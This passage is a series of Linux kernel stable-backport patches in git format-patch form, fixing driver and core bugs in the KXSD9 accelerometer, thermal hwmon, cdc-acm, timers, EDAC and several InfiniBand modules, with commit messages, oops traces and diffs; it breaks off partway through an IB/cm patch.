7ac61a062f3147dc23e3f12b9dfe7c4dd35f9cb8 upstream. Any readings from the raw interface of the KXSD9 driver will return an empty string, because it does not return IIO_VAL_INT but rather some random value from the accelerometer to the caller. Signed-off-by: Linus Walleij Signed-off-by: Jonathan Cameron Signed-off-by: Willy Tarreau --- drivers/iio/accel/kxsd9.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/iio/accel/kxsd9.c b/drivers/iio/accel/kxsd9.c index a22c427454d..d94c0ca6ec1 100644 --- a/drivers/iio/accel/kxsd9.c +++ b/drivers/iio/accel/kxsd9.c @@ -160,6 +160,7 @@ static int kxsd9_read_raw(struct iio_dev *indio_dev, if (ret < 0) goto error_ret; *val = ret; + ret = IIO_VAL_INT; break; case IIO_CHAN_INFO_SCALE: ret = spi_w8r8(st->us, KXSD9_READ(KXSD9_REG_CTRL_C)); From 4813b8bd3e7eea6ea15e439dcd01b42643d41fb4 Mon Sep 17 00:00:00 2001 From: Linus Walleij Date: Thu, 1 Sep 2016 11:44:35 +0200 Subject: [PATCH 197/315] iio: accel: kxsd9: Fix scaling bug commit 307fe9dd11ae44d4f8881ee449a7cbac36e1f5de upstream. All the scaling of the KXSD9 involves multiplication with a fraction number < 1. However the scaling value returned from IIO_INFO_SCALE was unpredictable as only the micros of the value was assigned, and not the integer part, resulting in scaling like this: $cat in_accel_scale -1057462640.011978 Fix this by assigning zero to the integer part. Tested-by: Jonathan Cameron Signed-off-by: Linus Walleij Signed-off-by: Jonathan Cameron Signed-off-by: Willy Tarreau --- drivers/iio/accel/kxsd9.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/iio/accel/kxsd9.c b/drivers/iio/accel/kxsd9.c index d94c0ca6ec1..4f9d178e5fd 100644 --- a/drivers/iio/accel/kxsd9.c +++ b/drivers/iio/accel/kxsd9.c @@ -166,6 +166,7 @@ static int kxsd9_read_raw(struct iio_dev *indio_dev, ret = spi_w8r8(st->us, KXSD9_READ(KXSD9_REG_CTRL_C)); if (ret < 0) goto error_ret; + *val = 0; *val2 = kxsd9_micro_scales[ret & KXSD9_FS_MASK]; ret = IIO_VAL_INT_PLUS_MICRO; break; From 995a387640ffec472f433677a67997f596a765f0 Mon Sep 17 00:00:00 2001 From: Krzysztof Kozlowski Date: Tue, 22 Nov 2016 19:22:44 +0200 Subject: [PATCH 198/315] thermal: hwmon: Properly report critical temperature in sysfs commit f37fabb8643eaf8e3b613333a72f683770c85eca upstream. In the critical sysfs entry the thermal hwmon was returning wrong temperature to the user-space. It was reporting the temperature of the first trip point instead of the temperature of critical trip point. For example: /sys/class/hwmon/hwmon0/temp1_crit:50000 /sys/class/thermal/thermal_zone0/trip_point_0_temp:50000 /sys/class/thermal/thermal_zone0/trip_point_0_type:active /sys/class/thermal/thermal_zone0/trip_point_3_temp:120000 /sys/class/thermal/thermal_zone0/trip_point_3_type:critical Since commit e68b16abd91d ("thermal: add hwmon sysfs I/F") the driver have been registering a sysfs entry if get_crit_temp() callback was provided. However when accessed, it was calling get_trip_temp() instead of the get_crit_temp(). Fixes: e68b16abd91d ("thermal: add hwmon sysfs I/F") Signed-off-by: Krzysztof Kozlowski Signed-off-by: Zhang Rui [wt: s/thermal_hwmon.c/thermal_core.c in 3.10] Signed-off-by: Willy Tarreau --- drivers/thermal/thermal_core.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c index d755440791b..f9bf597e836 100644 --- a/drivers/thermal/thermal_core.c +++ b/drivers/thermal/thermal_core.c @@ -924,7 +924,7 @@ temp_crit_show(struct device *dev, struct device_attribute *attr, long temperature; int ret; - ret = tz->ops->get_trip_temp(tz, 0, &temperature); + ret = tz->ops->get_crit_temp(tz, &temperature); if (ret) return ret; From d4898081cf84eec81a21d9dc67cf6e3dbe583ce0 Mon Sep 17 00:00:00 2001 From: Gavin Li Date: Fri, 12 Aug 2016 00:52:56 -0700 Subject: [PATCH 199/315] cdc-acm: fix wrong pipe type on rx interrupt xfers commit add125054b8727103631dce116361668436ef6a7 upstream. This fixes the "BOGUS urb xfer" warning logged by usb_submit_urb(). Signed-off-by: Gavin Li Acked-by: Oliver Neukum Signed-off-by: Greg Kroah-Hartman Signed-off-by: Willy Tarreau --- drivers/usb/class/cdc-acm.c | 5 ++--- drivers/usb/class/cdc-acm.h | 1 - 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/drivers/usb/class/cdc-acm.c b/drivers/usb/class/cdc-acm.c index e7436ebbf04..b364845de5a 100644 --- a/drivers/usb/class/cdc-acm.c +++ b/drivers/usb/class/cdc-acm.c @@ -1213,7 +1213,6 @@ made_compressed_probe: spin_lock_init(&acm->write_lock); spin_lock_init(&acm->read_lock); mutex_init(&acm->mutex); - acm->rx_endpoint = usb_rcvbulkpipe(usb_dev, epread->bEndpointAddress); acm->is_int_ep = usb_endpoint_xfer_int(epread); if (acm->is_int_ep) acm->bInterval = epread->bInterval; @@ -1262,14 +1261,14 @@ made_compressed_probe: urb->transfer_dma = rb->dma; if (acm->is_int_ep) { usb_fill_int_urb(urb, acm->dev, - acm->rx_endpoint, + usb_rcvintpipe(usb_dev, epread->bEndpointAddress), rb->base, acm->readsize, acm_read_bulk_callback, rb, acm->bInterval); } else { usb_fill_bulk_urb(urb, acm->dev, - acm->rx_endpoint, + usb_rcvbulkpipe(usb_dev, epread->bEndpointAddress), rb->base, acm->readsize, acm_read_bulk_callback, rb); diff --git a/drivers/usb/class/cdc-acm.h b/drivers/usb/class/cdc-acm.h index 1683ac161cf..bf4e1bb4fb2 100644 --- a/drivers/usb/class/cdc-acm.h +++ b/drivers/usb/class/cdc-acm.h @@ -95,7 +95,6 @@ struct acm { struct urb *read_urbs[ACM_NR]; struct acm_rb read_buffers[ACM_NR]; int rx_buflimit; - int rx_endpoint; spinlock_t read_lock; int write_used; /* number of non-empty write buffers */ int transmitting; From de3e6236be56af86c2ce3ec698b10426dadc9916 Mon Sep 17 00:00:00 2001 From: Tejun Heo Date: Wed, 4 Nov 2015 12:15:33 -0500 Subject: [PATCH 200/315] timers: Use proper base migration in add_timer_on() commit 22b886dd1018093920c4250dee2a9a3cb7cff7b8 upstream. Regardless of the previous CPU a timer was on, add_timer_on() currently simply sets timer->flags to the new CPU. As the caller must be seeing the timer as idle, this is locally fine, but the timer leaving the old base while unlocked can lead to race conditions as follows. Let's say timer was on cpu 0. cpu 0 cpu 1 ----------------------------------------------------------------------------- del_timer(timer) succeeds del_timer(timer) lock_timer_base(timer) locks cpu_0_base add_timer_on(timer, 1) spin_lock(&cpu_1_base->lock) timer->flags set to cpu_1_base operates on @timer operates on @timer This triggered with mod_delayed_work_on() which contains "if (del_timer()) add_timer_on()" sequence eventually leading to the following oops. BUG: unable to handle kernel NULL pointer dereference at (null) IP: [] detach_if_pending+0x69/0x1a0 ... Workqueue: wqthrash wqthrash_workfunc [wqthrash] task: ffff8800172ca680 ti: ffff8800172d0000 task.ti: ffff8800172d0000 RIP: 0010:[] [] detach_if_pending+0x69/0x1a0 ... Call Trace: [] del_timer+0x44/0x60 [] try_to_grab_pending+0xb6/0x160 [] mod_delayed_work_on+0x33/0x80 [] wqthrash_workfunc+0x61/0x90 [wqthrash] [] process_one_work+0x1e8/0x650 [] worker_thread+0x4e/0x450 [] kthread+0xef/0x110 [] ret_from_fork+0x3f/0x70 Fix it by updating add_timer_on() to perform proper migration as __mod_timer() does. Mike: apply tglx backport Reported-and-tested-by: Jeff Layton Signed-off-by: Tejun Heo Cc: Chris Worley Cc: bfields@fieldses.org Cc: Michael Skralivetsky Cc: Trond Myklebust Cc: Shaohua Li Cc: Jeff Layton Cc: kernel-team@fb.com Cc: stable@vger.kernel.org Link: http://lkml.kernel.org/r/20151029103113.2f893924@tlielax.poochiereds.net Link: http://lkml.kernel.org/r/20151104171533.GI5749@mtj.duckdns.org Signed-off-by: Thomas Gleixner Signed-off-by: Mike Galbraith Signed-off-by: Willy Tarreau --- kernel/timer.c | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/kernel/timer.c b/kernel/timer.c index 20f45ea6f5a..be22e45dc36 100644 --- a/kernel/timer.c +++ b/kernel/timer.c @@ -923,13 +923,26 @@ EXPORT_SYMBOL(add_timer); */ void add_timer_on(struct timer_list *timer, int cpu) { - struct tvec_base *base = per_cpu(tvec_bases, cpu); + struct tvec_base *new_base = per_cpu(tvec_bases, cpu); + struct tvec_base *base; unsigned long flags; timer_stats_timer_set_start_info(timer); BUG_ON(timer_pending(timer) || !timer->function); - spin_lock_irqsave(&base->lock, flags); - timer_set_base(timer, base); + + /* + * If @timer was on a different CPU, it should be migrated with the + * old base locked to prevent other operations proceeding with the + * wrong base locked. See lock_timer_base(). + */ + base = lock_timer_base(timer, &flags); + if (base != new_base) { + timer_set_base(timer, NULL); + spin_unlock(&base->lock); + base = new_base; + spin_lock(&base->lock); + timer_set_base(timer, base); + } debug_activate(timer, timer->expires); internal_add_timer(base, timer); /* From c6983c1f9f9b3327ee762c8059b8987c26498e44 Mon Sep 17 00:00:00 2001 From: Emmanouil Maroudas Date: Sat, 23 Apr 2016 18:33:00 +0300 Subject: [PATCH 201/315] EDAC: Increment correct counter in edac_inc_ue_error() commit 993f88f1cc7f0879047ff353e824e5cc8f10adfc upstream. Fix typo in edac_inc_ue_error() to increment ue_noinfo_count instead of ce_noinfo_count. Signed-off-by: Emmanouil Maroudas Cc: Mauro Carvalho Chehab Cc: linux-edac Fixes: 4275be635597 ("edac: Change internal representation to work with layers") Link: http://lkml.kernel.org/r/1461425580-5898-1-git-send-email-emmanouil.maroudas@gmail.com Signed-off-by: Borislav Petkov Signed-off-by: Willy Tarreau --- drivers/edac/edac_mc.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/edac/edac_mc.c b/drivers/edac/edac_mc.c index a9d98cdd11f..9e15fc8df06 100644 --- a/drivers/edac/edac_mc.c +++ b/drivers/edac/edac_mc.c @@ -968,7 +968,7 @@ static void edac_inc_ue_error(struct mem_ctl_info *mci, mci->ue_mc += count; if (!enable_per_layer_report) { - mci->ce_noinfo_count += count; + mci->ue_noinfo_count += count; return; } From 27816fef78ae4c88cb91a5cedfc159fe2a4464b0 Mon Sep 17 00:00:00 2001 From: Erez Shitrit Date: Sun, 28 Aug 2016 10:58:31 +0300 Subject: [PATCH 202/315] IB/ipoib: Fix memory corruption in ipoib cm mode connect flow commit 546481c2816ea3c061ee9d5658eb48070f69212e upstream. When a new CM connection is being requested, ipoib driver copies data from the path pointer in the CM/tx object, the path object might be invalid at the point and memory corruption will happened later when now the CM driver will try using that data. The next scenario demonstrates it: neigh_add_path --> ipoib_cm_create_tx --> queue_work (pointer to path is in the cm/tx struct) #while the work is still in the queue, #the port goes down and causes the ipoib_flush_paths: ipoib_flush_paths --> path_free --> kfree(path) #at this point the work scheduled starts. ipoib_cm_tx_start --> copy from the (invalid)path pointer: (memcpy(&pathrec, &p->path->pathrec, sizeof pathrec);) -> memory corruption. To fix that the driver now starts the CM/tx connection only if that specific path exists in the general paths database. This check is protected with the relevant locks, and uses the gid from the neigh member in the CM/tx object which is valid according to the ref count that was taken by the CM/tx. Fixes: 839fcaba35 ('IPoIB: Connected mode experimental support') Signed-off-by: Erez Shitrit Signed-off-by: Leon Romanovsky Signed-off-by: Doug Ledford Signed-off-by: Willy Tarreau --- drivers/infiniband/ulp/ipoib/ipoib.h | 1 + drivers/infiniband/ulp/ipoib/ipoib_cm.c | 16 ++++++++++++++++ drivers/infiniband/ulp/ipoib/ipoib_main.c | 2 +- 3 files changed, 18 insertions(+), 1 deletion(-) diff --git a/drivers/infiniband/ulp/ipoib/ipoib.h b/drivers/infiniband/ulp/ipoib/ipoib.h index eb71aaa26a9..fb9a7b340f1 100644 --- a/drivers/infiniband/ulp/ipoib/ipoib.h +++ b/drivers/infiniband/ulp/ipoib/ipoib.h @@ -460,6 +460,7 @@ void ipoib_send(struct net_device *dev, struct sk_buff *skb, struct ipoib_ah *address, u32 qpn); void ipoib_reap_ah(struct work_struct *work); +struct ipoib_path *__path_find(struct net_device *dev, void *gid); void ipoib_mark_paths_invalid(struct net_device *dev); void ipoib_flush_paths(struct net_device *dev); struct ipoib_dev_priv *ipoib_intf_alloc(const char *format); diff --git a/drivers/infiniband/ulp/ipoib/ipoib_cm.c b/drivers/infiniband/ulp/ipoib/ipoib_cm.c index 3eceb61e353..aa9ad2d70dd 100644 --- a/drivers/infiniband/ulp/ipoib/ipoib_cm.c +++ b/drivers/infiniband/ulp/ipoib/ipoib_cm.c @@ -1290,6 +1290,8 @@ void ipoib_cm_destroy_tx(struct ipoib_cm_tx *tx) } } +#define QPN_AND_OPTIONS_OFFSET 4 + static void ipoib_cm_tx_start(struct work_struct *work) { struct ipoib_dev_priv *priv = container_of(work, struct ipoib_dev_priv, @@ -1298,6 +1300,7 @@ static void ipoib_cm_tx_start(struct work_struct *work) struct ipoib_neigh *neigh; struct ipoib_cm_tx *p; unsigned long flags; + struct ipoib_path *path; int ret; struct ib_sa_path_rec pathrec; @@ -1310,7 +1313,19 @@ static void ipoib_cm_tx_start(struct work_struct *work) p = list_entry(priv->cm.start_list.next, typeof(*p), list); list_del_init(&p->list); neigh = p->neigh; + qpn = IPOIB_QPN(neigh->daddr); + /* + * As long as the search is with these 2 locks, + * path existence indicates its validity. + */ + path = __path_find(dev, neigh->daddr + QPN_AND_OPTIONS_OFFSET); + if (!path) { + pr_info("%s ignore not valid path %pI6\n", + __func__, + neigh->daddr + QPN_AND_OPTIONS_OFFSET); + goto free_neigh; + } memcpy(&pathrec, &p->path->pathrec, sizeof pathrec); spin_unlock_irqrestore(&priv->lock, flags); @@ -1322,6 +1337,7 @@ static void ipoib_cm_tx_start(struct work_struct *work) spin_lock_irqsave(&priv->lock, flags); if (ret) { +free_neigh: neigh = p->neigh; if (neigh) { neigh->cm = NULL; diff --git a/drivers/infiniband/ulp/ipoib/ipoib_main.c b/drivers/infiniband/ulp/ipoib/ipoib_main.c index a481094af85..375f9edd402 100644 --- a/drivers/infiniband/ulp/ipoib/ipoib_main.c +++ b/drivers/infiniband/ulp/ipoib/ipoib_main.c @@ -251,7 +251,7 @@ int ipoib_set_mode(struct net_device *dev, const char *buf) return -EINVAL; } -static struct ipoib_path *__path_find(struct net_device *dev, void *gid) +struct ipoib_path *__path_find(struct net_device *dev, void *gid) { struct ipoib_dev_priv *priv = netdev_priv(dev); struct rb_node *n = priv->path_tree.rb_node; From 4f0992c3ce721d9820d6450ebd70dd60aa9ea387 Mon Sep 17 00:00:00 2001 From: Erez Shitrit Date: Sun, 28 Aug 2016 10:58:30 +0300 Subject: [PATCH 203/315] IB/core: Fix use after free in send_leave function commit 68c6bcdd8bd00394c234b915ab9b97c74104130c upstream. The function send_leave sets the member: group->query_id (group->query_id = ret) after calling the sa_query, but leave_handler can be executed before the setting and it might delete the group object, and will get a memory corruption. Additionally, this patch gets rid of group->query_id variable which is not used. Fixes: faec2f7b96b5 ('IB/sa: Track multicast join/leave requests') Signed-off-by: Erez Shitrit Signed-off-by: Leon Romanovsky Signed-off-by: Doug Ledford Signed-off-by: Willy Tarreau --- drivers/infiniband/core/multicast.c | 13 ++----------- 1 file changed, 2 insertions(+), 11 deletions(-) diff --git a/drivers/infiniband/core/multicast.c b/drivers/infiniband/core/multicast.c index d2360a8ef0b..180d7f436ed 100644 --- a/drivers/infiniband/core/multicast.c +++ b/drivers/infiniband/core/multicast.c @@ -106,7 +106,6 @@ struct mcast_group { atomic_t refcount; enum mcast_group_state state; struct ib_sa_query *query; - int query_id; u16 pkey_index; u8 leave_state; int retries; @@ -339,11 +338,7 @@ static int send_join(struct mcast_group *group, struct mcast_member *member) member->multicast.comp_mask, 3000, GFP_KERNEL, join_handler, group, &group->query); - if (ret >= 0) { - group->query_id = ret; - ret = 0; - } - return ret; + return (ret > 0) ? 0 : ret; } static int send_leave(struct mcast_group *group, u8 leave_state) @@ -363,11 +358,7 @@ static int send_leave(struct mcast_group *group, u8 leave_state) IB_SA_MCMEMBER_REC_JOIN_STATE, 3000, GFP_KERNEL, leave_handler, group, &group->query); - if (ret >= 0) { - group->query_id = ret; - ret = 0; - } - return ret; + return (ret > 0) ? 0 : ret; } static void join_group(struct mcast_group *group, struct mcast_member *member, From b81459c78935e4579a577b2366c5f8878d3c7fee Mon Sep 17 00:00:00 2001 From: Alex Vesker Date: Mon, 12 Sep 2016 09:55:28 +0300 Subject: [PATCH 204/315] IB/ipoib: Don't allow MC joins during light MC flush commit 344bacca8cd811809fc33a249f2738ab757d327f upstream. This fix solves a race between light flush and on the fly joins. Light flush doesn't set the device to down and unset IPOIB_OPER_UP flag, this means that if while flushing we have a MC join in progress and the QP was attached to BC MGID we can have a mismatches when re-attaching a QP to the BC MGID. The light flush would set the broadcast group to NULL causing an on the fly join to rejoin and reattach to the BC MCG as well as adding the BC MGID to the multicast list. The flush process would later on remove the BC MGID and detach it from the QP. On the next flush the BC MGID is present in the multicast list but not found when trying to detach it because of the previous double attach and single detach. [18332.714265] ------------[ cut here ]------------ [18332.717775] WARNING: CPU: 6 PID: 3767 at drivers/infiniband/core/verbs.c:280 ib_dealloc_pd+0xff/0x120 [ib_core] ... [18332.775198] Hardware name: Red Hat KVM, BIOS Bochs 01/01/2011 [18332.779411] 0000000000000000 ffff8800b50dfbb0 ffffffff813fed47 0000000000000000 [18332.784960] 0000000000000000 ffff8800b50dfbf0 ffffffff8109add1 0000011832f58300 [18332.790547] ffff880226a596c0 ffff880032482000 ffff880032482830 ffff880226a59280 [18332.796199] Call Trace: [18332.798015] [] dump_stack+0x63/0x8c [18332.801831] [] __warn+0xd1/0xf0 [18332.805403] [] warn_slowpath_null+0x1d/0x20 [18332.809706] [] ib_dealloc_pd+0xff/0x120 [ib_core] [18332.814384] [] ipoib_transport_dev_cleanup+0xfc/0x1d0 [ib_ipoib] [18332.820031] [] ipoib_ib_dev_cleanup+0x98/0x110 [ib_ipoib] [18332.825220] [] ipoib_dev_cleanup+0x2d8/0x550 [ib_ipoib] [18332.830290] [] ipoib_uninit+0x2f/0x40 [ib_ipoib] [18332.834911] [] rollback_registered_many+0x1aa/0x2c0 [18332.839741] [] rollback_registered+0x31/0x40 [18332.844091] [] unregister_netdevice_queue+0x48/0x80 [18332.848880] [] ipoib_vlan_delete+0x1fb/0x290 [ib_ipoib] [18332.853848] [] delete_child+0x7d/0xf0 [ib_ipoib] [18332.858474] [] dev_attr_store+0x18/0x30 [18332.862510] [] sysfs_kf_write+0x3a/0x50 [18332.866349] [] kernfs_fop_write+0x120/0x170 [18332.870471] [] __vfs_write+0x28/0xe0 [18332.874152] [] ? percpu_down_read+0x1f/0x50 [18332.878274] [] vfs_write+0xa2/0x1a0 [18332.881896] [] SyS_write+0x46/0xa0 [18332.885632] [] do_syscall_64+0x57/0xb0 [18332.889709] [] entry_SYSCALL64_slow_path+0x25/0x25 [18332.894727] ---[ end trace 09ebbe31f831ef17 ]--- Fixes: ee1e2c82c245 ("IPoIB: Refresh paths instead of flushing them on SM change events") Signed-off-by: Alex Vesker Signed-off-by: Leon Romanovsky Signed-off-by: Doug Ledford Signed-off-by: Willy Tarreau --- drivers/infiniband/ulp/ipoib/ipoib_ib.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/infiniband/ulp/ipoib/ipoib_ib.c b/drivers/infiniband/ulp/ipoib/ipoib_ib.c index 2cfa76f5d99..39168d3cb7d 100644 --- a/drivers/infiniband/ulp/ipoib/ipoib_ib.c +++ b/drivers/infiniband/ulp/ipoib/ipoib_ib.c @@ -979,8 +979,17 @@ static void __ipoib_ib_dev_flush(struct ipoib_dev_priv *priv, } if (level == IPOIB_FLUSH_LIGHT) { + int oper_up; ipoib_mark_paths_invalid(dev); + /* Set IPoIB operation as down to prevent races between: + * the flush flow which leaves MCG and on the fly joins + * which can happen during that time. mcast restart task + * should deal with join requests we missed. + */ + oper_up = test_and_clear_bit(IPOIB_FLAG_OPER_UP, &priv->flags); ipoib_mcast_dev_flush(dev); + if (oper_up) + set_bit(IPOIB_FLAG_OPER_UP, &priv->flags); } if (level >= IPOIB_FLUSH_NORMAL) From 95bc51b50455fec08f8058ead67fb92db5fea9e0 Mon Sep 17 00:00:00 2001 From: Alex Vesker Date: Mon, 12 Sep 2016 19:16:18 +0300 Subject: [PATCH 205/315] IB/mlx4: Fix incorrect MC join state bit-masking on SR-IOV commit e5ac40cd66c2f3cd11bc5edc658f012661b16347 upstream. Because of an incorrect bit-masking done on the join state bits, when handling a join request we failed to detect a difference between the group join state and the request join state when joining as send only full member (0x8). This caused the MC join request not to be sent. This issue is relevant only when SRIOV is enabled and SM supports send only full member. This fix separates scope bits and join states bits a nibble each. Fixes: b9c5d6a64358 ('IB/mlx4: Add multicast group (MCG) paravirtualization for SR-IOV') Signed-off-by: Alex Vesker Signed-off-by: Leon Romanovsky Signed-off-by: Doug Ledford Signed-off-by: Willy Tarreau --- drivers/infiniband/hw/mlx4/mcg.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/infiniband/hw/mlx4/mcg.c b/drivers/infiniband/hw/mlx4/mcg.c index 25b2cdff00f..27bedc39b47 100644 --- a/drivers/infiniband/hw/mlx4/mcg.c +++ b/drivers/infiniband/hw/mlx4/mcg.c @@ -483,7 +483,7 @@ static u8 get_leave_state(struct mcast_group *group) if (!group->members[i]) leave_state |= (1 << i); - return leave_state & (group->rec.scope_join_state & 7); + return leave_state & (group->rec.scope_join_state & 0xf); } static int join_group(struct mcast_group *group, int slave, u8 join_mask) @@ -558,8 +558,8 @@ static void mlx4_ib_mcg_timeout_handler(struct work_struct *work) } else mcg_warn_group(group, "DRIVER BUG\n"); } else if (group->state == MCAST_LEAVE_SENT) { - if (group->rec.scope_join_state & 7) - group->rec.scope_join_state &= 0xf8; + if (group->rec.scope_join_state & 0xf) + group->rec.scope_join_state &= 0xf0; group->state = MCAST_IDLE; mutex_unlock(&group->lock); if (release_group(group, 1)) @@ -599,7 +599,7 @@ static int handle_leave_req(struct mcast_group *group, u8 leave_mask, static int handle_join_req(struct mcast_group *group, u8 join_mask, struct mcast_req *req) { - u8 group_join_state = group->rec.scope_join_state & 7; + u8 group_join_state = group->rec.scope_join_state & 0xf; int ref = 0; u16 status; struct ib_sa_mcmember_data *sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data; @@ -684,8 +684,8 @@ static void mlx4_ib_mcg_work_handler(struct work_struct *work) u8 cur_join_state; resp_join_state = ((struct ib_sa_mcmember_data *) - group->response_sa_mad.data)->scope_join_state & 7; - cur_join_state = group->rec.scope_join_state & 7; + group->response_sa_mad.data)->scope_join_state & 0xf; + cur_join_state = group->rec.scope_join_state & 0xf; if (method == IB_MGMT_METHOD_GET_RESP) { /* successfull join */ @@ -704,7 +704,7 @@ process_requests: req = list_first_entry(&group->pending_list, struct mcast_req, group_list); sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data; - req_join_state = sa_data->scope_join_state & 0x7; + req_join_state = sa_data->scope_join_state & 0xf; /* For a leave request, we will immediately answer the VF, and * update our internal counters. The actual leave will be sent From 1aecb8e4179bb9f5b60f0819b4ddc32f0f9ef6bc Mon Sep 17 00:00:00 2001 From: Matan Barak Date: Thu, 10 Nov 2016 11:30:55 +0200 Subject: [PATCH 206/315] IB/mlx4: Fix create CQ error flow commit 593ff73bcfdc79f79a8a0df55504f75ad3e5d1a9 upstream. Currently, if ib_copy_to_udata fails, the CQ won't be deleted from the radix tree and the HW (HW2SW). Fixes: 225c7b1feef1 ('IB/mlx4: Add a driver Mellanox ConnectX InfiniBand adapters') Signed-off-by: Matan Barak Signed-off-by: Daniel Jurgens Reviewed-by: Mark Bloch Signed-off-by: Leon Romanovsky Signed-off-by: Doug Ledford Signed-off-by: Willy Tarreau --- drivers/infiniband/hw/mlx4/cq.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/infiniband/hw/mlx4/cq.c b/drivers/infiniband/hw/mlx4/cq.c index d5e60f44ba5..5b8a62c6bc8 100644 --- a/drivers/infiniband/hw/mlx4/cq.c +++ b/drivers/infiniband/hw/mlx4/cq.c @@ -239,11 +239,14 @@ struct ib_cq *mlx4_ib_create_cq(struct ib_device *ibdev, int entries, int vector if (context) if (ib_copy_to_udata(udata, &cq->mcq.cqn, sizeof (__u32))) { err = -EFAULT; - goto err_dbmap; + goto err_cq_free; } return &cq->ibcq; +err_cq_free: + mlx4_cq_free(dev->dev, &cq->mcq); + err_dbmap: if (context) mlx4_ib_db_unmap_user(to_mucontext(context), &cq->db); From 52aac91d3a712331ea4a7c99415a6dfc782d875d Mon Sep 17 00:00:00 2001 From: Tariq Toukan Date: Thu, 27 Oct 2016 16:36:26 +0300 Subject: [PATCH 207/315] IB/uverbs: Fix leak of XRC target QPs commit 5b810a242c28e1d8d64d718cebe75b79d86a0b2d upstream. The real QP is destroyed in case of the ref count reaches zero, but for XRC target QPs this call was missed and caused to QP leaks. Let's call to destroy for all flows. Fixes: 0e0ec7e0638e ('RDMA/core: Export ib_open_qp() to share XRC...') Signed-off-by: Tariq Toukan Signed-off-by: Noa Osherovich Signed-off-by: Leon Romanovsky Signed-off-by: Doug Ledford Signed-off-by: Willy Tarreau --- drivers/infiniband/core/uverbs_main.c | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/drivers/infiniband/core/uverbs_main.c b/drivers/infiniband/core/uverbs_main.c index f50623d07a7..37b72079414 100644 --- a/drivers/infiniband/core/uverbs_main.c +++ b/drivers/infiniband/core/uverbs_main.c @@ -224,12 +224,9 @@ static int ib_uverbs_cleanup_ucontext(struct ib_uverbs_file *file, container_of(uobj, struct ib_uqp_object, uevent.uobject); idr_remove_uobj(&ib_uverbs_qp_idr, uobj); - if (qp != qp->real_qp) { - ib_close_qp(qp); - } else { + if (qp == qp->real_qp) ib_uverbs_detach_umcast(qp, uqp); - ib_destroy_qp(qp); - } + ib_destroy_qp(qp); ib_uverbs_release_uevent(file, &uqp->uevent); kfree(uqp); } From aa19a88935f6d93b6b5468dc4b8ca4da9cb2ef29 Mon Sep 17 00:00:00 2001 From: Mark Bloch Date: Thu, 27 Oct 2016 16:36:27 +0300 Subject: [PATCH 208/315] IB/cm: Mark stale CM id's whenever the mad agent was unregistered commit 9db0ff53cb9b43ed75bacd42a89c1a0ab048b2b0 upstream. When there is a CM id object that has port assigned to it, it means that the cm-id asked for the specific port that it should go by it, but if that port was removed (hot-unplug event) the cm-id was not updated. In order to fix that the port keeps a list of all the cm-id's that are planning to go by it, whenever the port is removed it marks all of them as invalid. This commit fixes a kernel panic which happens when running traffic between guests and we force reboot a guest mid traffic, it triggers a kernel panic: Call Trace: [] ? panic+0xa7/0x16f [] ? oops_end+0xe4/0x100 [] ? no_context+0xfb/0x260 [] ? del_timer_sync+0x22/0x30 [] ? __bad_area_nosemaphore+0x125/0x1e0 [] ? process_timeout+0x0/0x10 [] ? bad_area_nosemaphore+0x13/0x20 [] ? __do_page_fault+0x31f/0x480 [] ? default_wake_function+0x0/0x20 [] ? free_msg+0x55/0x70 [mlx5_core] [] ? cmd_exec+0x124/0x840 [mlx5_core] [] ? find_busiest_group+0x244/0x9f0 [] ? do_page_fault+0x3e/0xa0 [] ? page_fault+0x25/0x30 [] ? cm_alloc_msg+0x35/0xc0 [ib_cm] [] ? ib_send_cm_dreq+0xb1/0x1e0 [ib_cm] [] ? cm_destroy_id+0x176/0x320 [ib_cm] [] ? ib_destroy_cm_id+0x10/0x20 [ib_cm] [] ? ipoib_cm_free_rx_reap_list+0xa7/0x110 [ib_ipoib] [] ? ipoib_cm_rx_reap+0x0/0x20 [ib_ipoib] [] ? ipoib_cm_rx_reap+0x15/0x20 [ib_ipoib] [] ? worker_thread+0x170/0x2a0 [] ? autoremove_wake_function+0x0/0x40 [] ? worker_thread+0x0/0x2a0 [] ? kthread+0x96/0xa0 [] ? child_rip+0xa/0x20 [] ? kthread+0x0/0xa0 [] ? child_rip+0x0/0x20 Fixes: a977049dacde ("[PATCH] IB: Add the kernel CM implementation") Signed-off-by: Mark Bloch Signed-off-by: Erez Shitrit Reviewed-by: Maor Gottlieb Signed-off-by: Leon Romanovsky Signed-off-by: Doug Ledford Signed-off-by: Willy Tarreau --- drivers/infiniband/core/cm.c | 127 ++++++++++++++++++++++++++++++----- 1 file changed, 111 insertions(+), 16 deletions(-) diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c index c410217fbe8..951a4f6a3b1 100644 --- a/drivers/infiniband/core/cm.c +++ b/drivers/infiniband/core/cm.c @@ -79,6 +79,8 @@ static struct ib_cm { __be32 random_id_operand; struct list_head timewait_list; struct workqueue_struct *wq; + /* Sync on cm change port state */ + spinlock_t state_lock; } cm; /* Counter indexes ordered by attribute ID */ @@ -160,6 +162,8 @@ struct cm_port { struct ib_mad_agent *mad_agent; struct kobject port_obj; u8 port_num; + struct list_head cm_priv_prim_list; + struct list_head cm_priv_altr_list; struct cm_counter_group counter_group[CM_COUNTER_GROUPS]; }; @@ -237,6 +241,12 @@ struct cm_id_private { u8 service_timeout; u8 target_ack_delay; + struct list_head prim_list; + struct list_head altr_list; + /* Indicates that the send port mad is registered and av is set */ + int prim_send_port_not_ready; + int altr_send_port_not_ready; + struct list_head work_list; atomic_t work_count; }; @@ -255,19 +265,46 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv, struct ib_mad_agent *mad_agent; struct ib_mad_send_buf *m; struct ib_ah *ah; + struct cm_av *av; + unsigned long flags, flags2; + int ret = 0; + /* don't let the port to be released till the agent is down */ + spin_lock_irqsave(&cm.state_lock, flags2); + 